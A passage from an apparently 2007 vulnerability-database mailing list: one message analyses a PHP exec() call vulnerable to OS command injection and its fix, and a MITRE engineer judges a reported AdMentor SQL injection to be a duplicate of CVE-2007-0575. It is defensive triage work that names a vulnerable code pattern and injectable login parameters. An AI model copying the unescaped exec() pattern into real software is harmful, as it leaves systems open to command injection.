".$val); } } $aumix is an executable. The "empty($val)" statement was fixed to: if (!empty($val) && is_numeric($val)){ So: 1) This is "OS Command Injection" by shell metacharacters in the exec(), with no escapeshellarg/escapeshellcmd. 2) "param" is not a parameter name at all, except the code seems to allow arbitrarily-named parameters, so maybe "param" would actually work. - Steve From heinbockel at mitre.org Wed Feb 28 14:39:36 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Wed, 28 Feb 2007 14:39:36 -0500 Subject: [VIM] AdMentor SQL injection Exploit (dupe of CVE-2007-0575) Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC019EF998@IMCSRV5.MITRE.ORG> BUGTRAQ:20070220 AdMentor Script Remote SQL injection Exploit http://www.securityfocus.com/archive/1/archive/1/460632/100/100/threade d Cr at zy_King claims that there is a SQL injection in AdMentor (admin/login.asp) via the kullanici and parola parameters. After some research, AdMentor does not appear to be distributed in Turkish, while kullanici and parola are Turkish for username and password. Not surprisingly, the provided exploit forum looks strangely similar to the one used here: http://www.securityfocus.com/archive/1/archive/1/453234/100/0/threaded Anyway, this appears to be a dupe of CVE-2007-0575 from last month. ===================================================== Multiple SQL injection vulnerabilities in the administrative login page in ASPCode.net AdMentor allow remote attackers to execute arbitrary SQL commands via the (1) Userid and (2) Password fields. William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615